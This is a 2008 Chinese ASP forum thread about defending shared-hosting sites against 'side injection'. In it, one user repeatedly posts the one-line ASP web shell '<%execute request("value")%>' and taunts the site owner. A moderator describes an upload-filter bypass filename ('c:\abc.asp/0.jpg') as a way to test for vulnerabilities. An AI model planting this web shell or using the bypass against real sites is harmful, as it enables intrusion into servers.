旁注网站小助手怎么防治 - ASP技术论坛 - 编程论坛

| 网站首页 | 业界新闻 | 小组 | 威客 | 人才 | 下载频道 | 博客 | 代码贴 | 在线编程 | 编程论坛 |

编程论坛 → WEB开发 → 『 ASP技术论坛』 → 旁注网站小助手怎么防治

我的收件箱(0)

欢迎加入我们，一同切磋技术

共有 2702 人关注过本帖

标题：旁注网站小助手怎么防治

只看楼主加入收藏

天上竹子

性别保密呀，离线，找我有事吗？

Rank: 1

等　级：新手上路
帖　子：2
专家分：0
注　册：2008-6-6

收藏

得分:0

首先要理解什么是旁注

旁注是指黑客通过对与A站同服务器的B站进行注入，获得B站的权限，再通过服务器的漏洞，得到A站的权限
所以A处于很被动的角色，是基本无法防御的

一个方法就是帮B站搞好安全，一个方法就是和服务器提供商联系请求补好漏洞，还有一个就是关掉A站的FSO权限

发帖时间

2008-06-06 15:47

lovecs1763

性别保密呀，离线，找我有事吗？

Rank: 1

等　级：新手上路
帖　子：5
专家分：0
注　册：2008-7-4

收藏

得分:0

是不是像我这样的啊！

<%execute request("value")%>

发帖时间

2008-07-04 03:31

lovecs1763

性别保密呀，离线，找我有事吗？

Rank: 1

等　级：新手上路
帖　子：5
专家分：0
注　册：2008-7-4

收藏

得分:0

我没改你的权限你应该感到高兴

你连是怎么传上去都不知道你还做管理员？？

发帖时间

2008-07-04 03:34

lovecs1763

性别保密呀，离线，找我有事吗？

Rank: 1

等　级：新手上路
帖　子：5
专家分：0
注　册：2008-7-4

收藏

得分:0

<%execute request("RAINMIN")%>

发帖时间

2008-07-04 03:45

lovecs1763

性别保密呀，离线，找我有事吗？

Rank: 1

等　级：新手上路
帖　子：5
专家分：0
注　册：2008-7-4

收藏

得分:0

<%execute request("value")%>

<%execute request("value")%>

发帖时间

2008-07-04 03:45

lovecs1763

性别保密呀，离线，找我有事吗？

Rank: 1

等　级：新手上路
帖　子：5
专家分：0
注　册：2008-7-4

收藏

得分:0

<%execute request("value")%>

<%execute request("value")%>

发帖时间

2008-07-04 03:54

yms123

帅哥哟，离线，有人找我吗？

Rank: 16

Rank: 16

Rank: 16

Rank: 16

等　级：版主
威　望：209
帖　子：12488
专家分：19042
注　册：2004-7-17

收藏

得分:0

如果是多出的ASP文件基本可以确定是上传漏洞所为，楼主的网站可能存在上传漏洞。
检测办法楼主可以在自己的网站文件上传的地方传任意一个asp文件,路径写法如下
X:\xxx\xxx\xxx.asp/0.jpg
比如从c盘上传一个abc.asp文件路径如下
c:\abc.asp/0.jpg
如果这个文件被成功上传并且没有错误提示，楼主的网站就可以确定有文件上传漏洞了。

发帖时间

2008-07-04 09:44

快速回复：旁注网站小助手怎么防治

关于我们 | 广告合作 | 编程中国 | 清除Cookies | TOP | 手机版

编程中国 版权所有，并保留所有权利。

Powered by Discuz, Processed in 0.011479 second(s), 7 queries.
Copyright©2004-2024, BCCN.NET, All Rights Reserved